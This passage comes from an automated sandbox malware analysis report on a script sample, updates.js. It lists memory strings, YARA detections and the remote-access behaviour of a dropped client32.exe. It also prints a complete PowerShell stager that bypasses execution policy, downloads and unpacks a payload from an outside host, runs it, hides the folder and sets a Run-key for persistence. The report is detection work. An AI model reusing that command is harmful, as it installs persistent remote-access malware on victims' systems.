                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalsCompositeOperation
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/variableCompositeOperation
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
                                Source: wscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BC0D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/echarts/issues/14266
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
                                Source: wscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
                                Source: wscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
                                Source: wscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                Source: wscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsperf.com/try-catch-performance-overhead
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://momentjs.com/
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BC156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BBE9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BBE9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes&url=$1
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes&url=$2
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes&url=$3
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes?url=$2
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes?url=$3
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/browser/security/internet-fraud.xml
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/browser/security/protection.html
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/browser/security/protection.htmlCopie
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/browser/security/protection.htmlSafe
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/yabrowser/security/sms-fraud.xml
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.uz/safety/?frombrowser=yes&url=$2
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.uz/support/browser/security/internet-fraud.xml
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.uz/support/browser/security/protection.htmlXavfsiz
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,3_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110335A0 GetClipboardFormatNameA,SetClipboardData,3_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,3_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110335A0 GetClipboardFormatNameA,SetClipboardData,7_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,3_2_11033320
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,3_2_110077A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,3_2_11114590
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,7_2_11114590
                                Source: Yara matchFile source: 8.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1988422325.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7968, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,3_2_111165C0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,7_2_111165C0

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: updates.js, type: SAMPLEMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: wscript.exe PID: 7336, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Powershell drops PE file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exeJump to dropped file
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Wscript starts Powershell (via cmd or directly)
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11113190: GetKeyState,DeviceIoControl,keybd_event,3_2_11113190
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1108C800 _memset,GetVersionExA,OpenWindowStationA,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopA,SetProcessWindowStation,CloseWindowStation,SetHandleInformation,SetHandleInformation,SetHandleInformation,_memset,LoadLibraryA,GetProcAddress,IsBadReadPtr,CreateProcessAsUserA,GetProcAddress,FreeLibrary,MsgWaitForMultipleObjects,MsgWaitForMultipleObjects,PeekMessageA,DispatchMessageA,PeekMessageA,DispatchMessageA,PeekMessageA,MsgWaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetLastError,CloseDesktop,GetLastError,SetProcessWindowStation,CloseWindowStation,GetLastError,7_2_1108C800
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110736803_2_11073680
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11029BB03_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110627B03_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110336D03_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110518003_2_11051800
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1115F8403_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1101BCD03_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11087F503_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11045E703_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1101C1103_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111640E03_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111683453_2_11168345
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111265B03_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110704303_2_11070430
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110807403_2_11080740
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1100892B3_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110627B07_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110736807_2_11073680
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110336D07_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110518007_2_11051800
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1115F8407_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11029BB07_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1101BCD07_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11087F507_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11045E707_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1101C1107_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111640E07_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111683457_2_11168345
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111265B07_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110704307_2_11070430
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110807407_2_11080740
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1100892B7_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1101CF307_2_1101CF30
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 11161299 appears 74 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 11027F40 appears 91 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 11164ED0 appears 38 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 110B7EF0 appears 39 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 11147060 appears 1043 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 1105E820 appears 518 times
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: String function: 1105E950 appears 48 times
